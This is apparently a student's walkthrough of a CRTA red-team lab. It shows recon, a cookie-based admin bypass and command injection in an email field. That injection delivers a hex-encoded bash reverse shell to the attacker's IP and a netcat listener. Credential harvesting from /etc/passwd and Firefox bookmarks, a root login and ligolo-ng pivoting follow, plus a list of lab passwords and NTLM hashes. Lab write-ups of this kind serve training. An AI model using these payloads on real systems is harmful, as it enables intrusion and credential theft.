CRTA done
CRTA¶
Notes¶
OS:¶
Linux Ubuntu: Foca 20.04 / 4ubuntu0.11
AD
Technology:¶
IP Address:¶
VPN IP Range: 10.10.200.0/24
External IP Range: 192.168.80.0/24
Internal IP Range: 192.168.98.0/24
192.168.80.10 - Linux Ubuntu
192.168.98.2 - DC01
192.168.98.120 - CDC
192.168.98.30 - MGMT
Open ports:¶
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Users and pass:¶
New account - http://192.168.80.10/registration.php
Jan Nowak
[email protected]
Qwerty
---
SSH - 192.168.80.10
L: privilege
P: Admin@962
---
Domain user: john - 192.168.98.30
U: [email protected]
P: User1@#$%6
---
Domain user: corpmngr - 192.168.98.120
U: corpmngr
P: User4&*&*
---
Domain user: krbtgt
U: krbtgt
H: aad3b435b51404eeaad3b435b51404ee
---
Domain user: Administrator
U: Administrator
H: aad3b435b51404eeaad3b435b51404ee:a2f7b77b62cd97161e18be2ffcfdfd60
Nmap: 192.168.80.10¶
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ sudo nmap -A -sV --script=default -p- -oA 192.168.80.10_nmap 192.168.80.10 ; cat 192.168.80.10_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-03 11:52 CEST
Nmap scan report for 192.168.80.10
Host is up (0.063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 8d:c3:a7:a5:bf:16:51:f2:03:85:a7:37:ee:ae:8d:81 (RSA)
| 256 9a:b2:73:5a:e5:36:b4:91:d8:8c:f7:4a:d0:15:65:28 (ECDSA)
|_ 256 3c:16:a7:6a:b6:33:c5:83:ab:7f:99:60:6a:4c:09:11 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Cyber WareFare Labs
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4
OS details: Linux 4.19 - 5.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Ffuz: http://192.168.80.10¶
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ ffuf -u http://192.168.80.10/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 192.168.80.10_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.80.10/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : 192.168.80.10_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
add.php [Status: 302, Size: 13412, Words: 2080, Lines: 429, Duration: 52ms]
assets [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 76ms]
[INFO] Adding a new job to the queue: http://192.168.80.10/assets/FUZZ
career.php [Status: 302, Size: 13175, Words: 1005, Lines: 424, Duration: 58ms]
config.php [Status: 200, Size: 2, Words: 3, Lines: 1, Duration: 64ms]
css [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 59ms]
[INFO] Adding a new job to the queue: http://192.168.80.10/css/FUZZ
down.php [Status: 200, Size: 326, Words: 37, Lines: 25, Duration: 97ms]
fonts [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 78ms]
[INFO] Adding a new job to the queue: http://192.168.80.10/fonts/FUZZ
index.php [Status: 200, Size: 4249, Words: 1890, Lines: 100, Duration: 58ms]
js [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 64ms]
[INFO] Adding a new job to the queue: http://192.168.80.10/js/FUZZ
logout.php [Status: 302, Size: 1, Words: 1, Lines: 2, Duration: 63ms]
order2.php [Status: 302, Size: 11807, Words: 1222, Lines: 408, Duration: 57ms]
os.php [Status: 200, Size: 727, Words: 46, Lines: 31, Duration: 58ms]
registration.php [Status: 200, Size: 3823, Words: 1667, Lines: 86, Duration: 91ms]
report.php [Status: 302, Size: 11107, Words: 795, Lines: 386, Duration: 67ms]
sam.txt [Status: 200, Size: 13, Words: 1, Lines: 2, Duration: 65ms]
search.php [Status: 200, Size: 444, Words: 42, Lines: 27, Duration: 63ms]
test5.php [Status: 200, Size: 401, Words: 142, Lines: 14, Duration: 93ms]
test6.php [Status: 200, Size: 2, Words: 3, Lines: 1, Duration: 56ms]
test7.php [Status: 302, Size: 51, Words: 4, Lines: 1, Duration: 61ms]
val.php [Status: 200, Size: 2941, Words: 1199, Lines: 83, Duration: 58ms]
[INFO] Starting queued job on target: http://192.168.80.10/assets/FUZZ
css [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 58ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://192.168.80.10/assets/css/
fonts [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 52ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://192.168.80.10/assets/fonts/
images [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 54ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://192.168.80.10/assets/images/
js [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 58ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://192.168.80.10/assets/js/
libs [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 70ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://192.168.80.10/assets/libs/
[INFO] Starting queued job on target: http://192.168.80.10/css/FUZZ
[INFO] Starting queued job on target: http://192.168.80.10/fonts/FUZZ
[INFO] Starting queued job on target: http://192.168.80.10/js/FUZZ
Open website: http://192.168.80.10¶
Just login page, nothing interesting
Create a account: http://192.168.80.10¶
Jan Nowak
[email protected]
Qwerty
Upload file: http://192.168.80.10/career.php¶
It is look like rabbithole, I can't upload file
Login as admin user: http://192.168.80.10/login.php¶
POST /index.php HTTP/1.1
Host: 192.168.80.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://192.168.80.10
Connection: keep-alive
Referer: http://192.168.80.10/index.php
Cookie: PHPSESSID=53t7alu2u6ovp596qo17rq4ukp
Upgrade-Insecure-Requests: 1
Priority: u=0, i
id=fake_user&password=Qwerty&remember=on
---
HTTP/1.1 302 Found
Date: Tue, 03 Jun 2025 11:17:48 GMT
Server: Apache/2.4.41 (Ubuntu)
location: logout.php
Set-Cookie: id=fake_user
Content-Length: 4252
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
---
GET /dashboard3.php HTTP/1.1
Host: 192.168.80.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Origin: http://192.168.80.10
Connection: keep-alive
Referer: http://192.168.80.10/dashboard3.php
Cookie: PHPSESSID=53t7alu2u6ovp596qo17rq4ukp;id=admin
Upgrade-Insecure-Requests: 1
Priority: u=0, i
---
<div class="col-lg-2 col-md-3 col-12">
<div class="right-bar">
<!-- Search Form -->
<a href=# class=single-icon><i class=fa fa-user-circle-o aria-hidden=true></i>admin</li> <div class="sinlge-bar">
<a href="#" class="single-icon"><i class="fa fa-user-circle-o" aria-hidden="true"></i></a>
<a>
</div>
<a href="logout.php?logout"> <i class="fe-log-out"></i><span>Logout</span>
Command injection: http://192.168.80.10/dashboard3.php¶
Entered payload to EMAIL
---
POST /dashboard3.php HTTP/1.1
Host: 192.168.80.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Origin: http://192.168.80.10
Connection: keep-alive
Referer: http://192.168.80.10/dashboard3.php
Cookie: PHPSESSID=53t7alu2u6ovp596qo17rq4ukp;id=admin
Upgrade-Insecure-Requests: 1
Priority: u=0, i
EMAIL=test%40wp.pl;ls
Revshell¶
Create a payload - hex¶
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ echo "bash -i >& /dev/tcp/10.10.200.239/22 0>&1" | xxd -ps -c 1024
62617368202d69203e26202f6465762f7463702f31302e31302e3230302e3233392f323220303e26310a
Run revshell¶
POST /dashboard3.php HTTP/1.1
Host: 192.168.80.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
Origin: http://192.168.80.10
Connection: keep-alive
Referer: http://192.168.80.10/dashboard3.php
Cookie: PHPSESSID=53t7alu2u6ovp596qo17rq4ukp;id=admin
Upgrade-Insecure-Requests: 1
Priority: u=0, i
EMAIL=test%40wp.pl;echo+62617368202d69203e26202f6465762f7463702f31302e31302e3230302e3233392f323220303e26310a+|+xxd+-ps+-r+|+bash
Start netcat listening¶
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ netcat -lvnp 22
listening on [any] 22 ...
connect to [10.10.200.239] from (UNKNOWN) [192.168.80.10] 54546
bash: cannot set terminal process group (898): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu-virtual-machine:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu-virtual-machine:/var/www/html$
Read /etc/passwd¶
Found password for user
L: privilege
P: Admin@962
---
www-data@ubuntu-virtual-machine:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
fwupd-refresh:x:122:127:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
geoclue:x:123:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:124:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
sssd:x:127:132:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
ubuntu:x:1000:1000:ubuntu,,,:/home/ubuntu:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
privilege:x:1001:1001:Admin@962:/home/privilege:/bin/bash
sshd:x:128:65534::/run/sshd:/usr/sbin/nologin
mysql:x:129:135:MySQL Server,,,:/nonexistent:/bin/false
www-data@ubuntu-virtual-machine:/var/www/html$
Login as root user¶
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ ssh [email protected]
The authenticity of host '192.168.80.10 (192.168.80.10)' can't be established.
ED25519 key fingerprint is SHA256:RHpGTqvkXkAP6/HA3vpHP8gkrtApbfyYYjteCh3N/TE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.80.10' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-67-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Introducing Expanded Security Maintenance for Applications.
Receive updates to over 25,000 software packages with your
Ubuntu Pro subscription. Free for personal use.
https://ubuntu.com/pro
Expanded Security Maintenance for Applications is not enabled.
273 updates can be applied immediately.
273 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
4 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Tue Jun 3 17:47:16 2025 from 10.10.200.207
privilege@ubuntu-virtual-machine:~$ id
uid=1001(privilege) gid=1001(privilege) groups=1001(privilege),27(sudo)
privilege@ubuntu-virtual-machine:~$ sudo -i
[sudo] password for privilege:
root@ubuntu-virtual-machine:~# cd /root
root@ubuntu-virtual-machine:~# ls -a
. .. .bash_history .bashrc .cache .local .mysql_history .profile snap .sqlite_history
root@ubuntu-virtual-machine:~#
Mozilla Firefox config file¶
Find config file for user privilege¶
privilege@ubuntu-virtual-machine:~/.mozilla/firefox/b2rri1qd.default-release$ ls -la
total 11864
drwx------ 14 privilege privilege 4096 Jan 19 20:27 .
drwx------ 6 privilege privilege 4096 Jan 16 17:22 ..
-rw-rw-r-- 1 privilege privilege 24 Jan 19 17:31 addons.json
-rw-rw-r-- 1 privilege privilege 6660 Jan 17 13:02 addonStartup.json.lz4
-rw-rw-r-- 1 privilege privilege 0 Jan 19 20:27 AlternateServices.txt
drwxr-xr-x 2 privilege privilege 4096 Jan 17 13:28 bookmarkbackups
-rw-rw-r-- 1 privilege privilege 216 Jan 17 13:16 broadcast-listeners.json
drwx------ 3 privilege privilege 4096 Jan 16 17:31 browser-extension-data
-rw------- 1 privilege privilege 229376 Jan 16 17:31 cert9.db
-rw------- 1 privilege privilege 161 Jan 16 17:22 compatibility.ini
-rw-rw-r-- 1 privilege privilege 939 Jan 16 17:22 containers.json
-rw-r--r-- 1 privilege privilege 229376 Jan 16 17:22 content-prefs.sqlite
-rw-r--r-- 1 privilege privilege 98304 Jan 16 17:22 cookies.sqlite
drwx------ 3 privilege privilege 4096 Jan 17 13:16 crashes
-rw-r--r-- 1 privilege privilege 98304 Jan 16 17:24 credentialstate.sqlite
drwxr-xr-x 4 privilege privilege 4096 Jan 19 20:27 datareporting
-rw-rw-r-- 1 privilege privilege 633 Jan 16 17:22 ExperimentStoreData.json
-rw-rw-r-- 1 privilege privilege 985 Jan 16 17:31 extension-preferences.json
-rw-rw-r-- 1 privilege privilege 41280 Jan 19 17:32 extensions.json
drwxr-xr-x 2 privilege privilege 4096 Jan 16 17:31 extension-store
-rw-r--r-- 1 privilege privilege 5242880 Jan 16 21:03 favicons.sqlite
-rw-r--r-- 1 privilege privilege 262144 Jan 17 13:06 formhistory.sqlite
drwxr-xr-x 3 privilege privilege 4096 Jan 17 17:32 gmp-gmpopenh264
-rw-rw-r-- 1 privilege privilege 410 Jan 16 17:22 handlers.json
-rw------- 1 privilege privilege 294912 Jan 16 17:22 key4.db
lrwxrwxrwx 1 privilege privilege 16 Jan 17 13:15 lock -> 127.0.1.1:+25657
drwx------ 2 privilege privilege 4096 Jan 16 17:22 minidumps
-rw-rw-r-- 1 privilege privilege 0 Jan 17 13:15 .parentlock
-rw-r--r-- 1 privilege privilege 98304 Jan 17 13:07 permissions.sqlite
-rw------- 1 privilege privilege 481 Jan 16 17:22 pkcs11.txt
-rw-r--r-- 1 privilege privilege 5242880 Jan 19 20:27 places.sqlite
-rw------- 1 privilege privilege 11986 Jan 19 20:27 prefs.js
-rw-r--r-- 1 privilege privilege 65536 Jan 17 13:02 protections.sqlite
drwx------ 2 privilege privilege 4096 Jan 19 20:27 saved-telemetry-pings
-rw-rw-r-- 1 privilege privilege 371 Jan 16 17:31 search.json.mozlz4
drwxrwxr-x 2 privilege privilege 4096 Jan 16 17:27 security_state
-rw-rw-r-- 1 privilege privilege 288 Jan 19 20:27 sessionCheckpoints.json
drwxr-xr-x 2 privilege privilege 4096 Jan 19 20:27 sessionstore-backups
-rw-rw-r-- 1 privilege privilege 566 Jan 19 20:27 sessionstore.jsonlz4
drwxr-xr-x 2 privilege privilege 4096 Jan 17 13:15 settings
-rw-rw-r-- 1 privilege privilege 18 Jan 16 17:22 shield-preference-experiments.json
-rw-rw-r-- 1 privilege privilege 907 Jan 17 13:20 SiteSecurityServiceState.txt
drwxr-xr-x 6 privilege privilege 4096 Jan 16 17:24 storage
-rw-r--r-- 1 privilege privilege 4096 Jan 19 20:27 storage.sqlite
-rwx------ 1 privilege privilege 50 Jan 16 17:22 times.json
-rw-r--r-- 1 privilege privilege 98304 Jan 16 17:24 webappsstore.sqlite
-rw-rw-r-- 1 privilege privilege 634 Jan 19 20:27 xulstore.json
Read table moz_bookmarks from places.sqlite¶
privilege@ubuntu-virtual-machine:~/.mozilla/firefox/b2rri1qd.default-release$ sqlite3 places.sqlite
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .tables
moz_anno_attributes moz_keywords
moz_annos moz_meta
moz_bookmarks moz_origins
moz_bookmarks_deleted moz_places
moz_historyvisits moz_places_metadata
moz_inputhistory moz_places_metadata_search_queries
moz_items_annos moz_previews_tombstones
Found creds for user [email protected]¶
IP: 192.168.98.30
U: [email protected]
P: User1@#$%6
---
sqlite> SELECT * FROM moz_bookmarks;
1|2||0|0||||1737028376389000|1737028407427000|root________|1|1
2|2||1|0|menu|||1737028376389000|1737028376683000|menu________|1|3
3|2||1|1|toolbar|||1737028376389000|1737028376773000|toolbar_____|1|3
4|2||1|2|tags|||1737028376389000|1737028376389000|tags________|1|1
5|2||1|3|unfiled|||1737028376389000|1737028407427000|unfiled_____|1|3
6|2||1|4|mobile|||1737028376397000|1737028376662000|mobile______|1|2
7|2||2|0|Mozilla Firefox|||1737028376683000|1737028376683000|2hqCSTYguEKz|0|1
8|1|3|7|0|Get Help|||1737028376683000|1737028376683000|w8bhWWymMHw6|0|1
9|1|4|7|1|Customize Firefox|||1737028376683000|1737028376683000|uctFzas86dQw|0|1
10|1|5|7|2|Get Involved|||1737028376683000|1737028376683000|z-X79YDQmgEh|0|1
11|1|6|7|3|About Us|||1737028376683000|1737028376683000|GeWYCw2g0FLJ|0|1
12|2||2|1|Ubuntu and Free Software links|||1737028376683000|1737028376683000|MxAMPgqX16gZ|0|1
13|1|7|12|0|Ubuntu|||1737028376683000|1737028376683000|QqE4CH5UIHOL|0|1
14|1|8|12|1|Ubuntu Wiki (community-edited website)|||1737028376683000|1737028376683000|nbf_eTKjwhpv|0|1
15|1|9|12|2|Make a Support Request to the Ubuntu Community|||1737028376683000|1737028376683000|ukdJ8dcfVTPm|0|1
16|1|10|12|3|Debian (Ubuntu is based on Debian)|||1737028376683000|1737028376683000|xgQMK5g3l2Zp|0|1
17|1|11|3|0|Getting Started|||1737028376773000|1737028376773000|Kt6IQ_eV70GT|0|1
18|1|16|5|0|http://192.168.98.30/admin/[email protected]&pass=User1@#$%6|||1737028407427000|1737029666390000|tuXr2pTr03P2|1|7
sqlite>
Create pivoting - ligolo-ng¶
Check all interfaces¶
Found a second interface: ens34
2: ens34: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
link/ether 00:50:56:96:e4:32 brd ff:ff:ff:ff:ff:ff
altname enp2s2
inet 192.168.98.15/24 brd 192.168.98.255 scope global noprefixroute ens34
valid_lft forever preferred_lft forever
---
root@ubuntu-virtual-machine:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens34: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
link/ether 00:50:56:96:e4:32 brd ff:ff:ff:ff:ff:ff
altname enp2s2
inet 192.168.98.15/24 brd 192.168.98.255 scope global noprefixroute ens34
valid_lft forever preferred_lft forever
3: ens32: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:96:62:dd brd ff:ff:ff:ff:ff:ff
altname enp2s0
inet 192.168.80.10/24 brd 192.168.80.255 scope global noprefixroute ens32
valid_lft forever preferred_lft forever
root@ubuntu-virtual-machine:~#
Download ligolo-ng¶
https://github.com/nicocha30/ligolo-ng/releases/tag/v0.8.2
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ wget -nv https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz
2025-06-06 12:33:23 URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/390351016/9baf3b13-1ffc-4b17-b940-3ff5b81b0ddc?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250606%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250606T103322Z&X-Amz-Expires=300&X-Amz-Signature=be4498837f41137994d6cc2c26768f52c9fbf259f840474b2283ff17e69481af&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dligolo-ng_proxy_0.8.2_linux_amd64.tar.gz&response-content-type=application%2Foctet-stream [7658004/7658004] -> "ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz" [1]
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ wget -nv https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_linux_amd64.tar.gz
2025-06-06 12:34:07 URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/390351016/53e88d45-e6bc-4b56-a3d6-20f11d27449c?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250606%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250606T103406Z&X-Amz-Expires=300&X-Amz-Signature=72d5fa46b93e6a3741a6ed480de573a0feabed9fa6e91ce4c5845aeb345c8a29&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dligolo-ng_agent_0.8.2_linux_amd64.tar.gz&response-content-type=application%2Foctet-stream [2760155/2760155] -> "ligolo-ng_agent_0.8.2_linux_amd64.tar.gz" [1]
Untar archive¶
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ mkdir ligolo-ng_proxy ; tar -xvzf ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz -C ligolo-ng_proxy
LICENSE
README.md
proxy
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ mkdir ligolo-ng_agent ; tar -xvzf ligolo-ng_agent_0.8.2_linux_amd64.tar.gz -C ligolo-ng_agent
LICENSE
README.md
agent
Upload agent to remote host¶
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA/ligolo-ng_agent]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.80.10 - - [05/Jun/2025 16:03:43] "GET /agent HTTP/1.1" 200 -
---
root@ubuntu-virtual-machine:~# cd /tmp/
root@ubuntu-virtual-machine:/tmp# wget http://10.10.200.239/agent
--2025-06-05 19:20:30-- http://10.10.200.239/agent
Connecting to 10.10.200.239:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6226072 (5.9M) [application/octet-stream]
Saving to: ‘agent’
agent 100%[==============================================>] 5.94M 5.06MB/s in 1.2s
2025-06-05 19:20:31 (5.06 MB/s) - ‘agent’ saved [6226072/6226072]
root@ubuntu-virtual-machine:/tmp# file agent
agent: ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), statically linked, Go BuildID=v3r31Mmmxzk1HhoNLgM9/VhZwLt9H6oKy81WBcYQD/EFksgavwJDRDY0r_iovA/z41SS8P0bVR-Mc05G5l_, stripped
root@ubuntu-virtual-machine:/tmp#
Configure pivoting¶
# Attacker
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA/ligolo-ng_proxy]
└─$ sudo ip tuntap add user $(whoami) mode tun ligolo
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA/ligolo-ng_proxy]
└─$ sudo ip route del 192.168.98.0/24 dev tun0
RTNETLINK answers: No such process
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA/ligolo-ng_proxy]
└─$ sudo ip link set ligolo up
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA/ligolo-ng_proxy]
└─$ sudo ip route add 192.168.98.0/24 dev ligolo
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA/ligolo-ng_proxy]
└─$ ip route
default via 192.168.126.2 dev eth0 proto dhcp src 192.168.126.128 metric 100
10.10.200.0/24 dev tun0 proto kernel scope link src 10.10.200.239
192.168.80.0/24 via 10.10.200.1 dev tun0
192.168.98.0/24 dev ligolo scope link linkdown
192.168.126.0/24 dev eth0 proto kernel scope link src 192.168.126.128 metric 100
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA/ligolo-ng_proxy]
└─$ ./proxy -selfcert -laddr 0.0.0.0:443
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
INFO[0000] Listening on 0.0.0.0:443
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: 0.8.2
ligolo-ng » INFO[0023] Agent joined. id=00505696e432 name=root@ubuntu-virtual-machine remote="192.168.80.10:45624"
ligolo-ng » session
? Specify a session : 1 - root@ubuntu-virtual-machine - 192.168.80.10:45624 - 00505696e432
[Agent : root@ubuntu-virtual-machine] » start
INFO[0078] Starting tunnel to root@ubuntu-virtual-machine (00505696e432)
[Agent : root@ubuntu-virtual-machine] » tunnel_list
┌───────────────────────────────────────────────────────────────────────────────────────────┐
│ Active sessions and tunnels │
├───┬──────────────────────────────────────────────────────────────────┬───────────┬────────┤
│ # │ AGENT │ INTERFACE │ STATUS │
├───┼──────────────────────────────────────────────────────────────────┼───────────┼────────┤
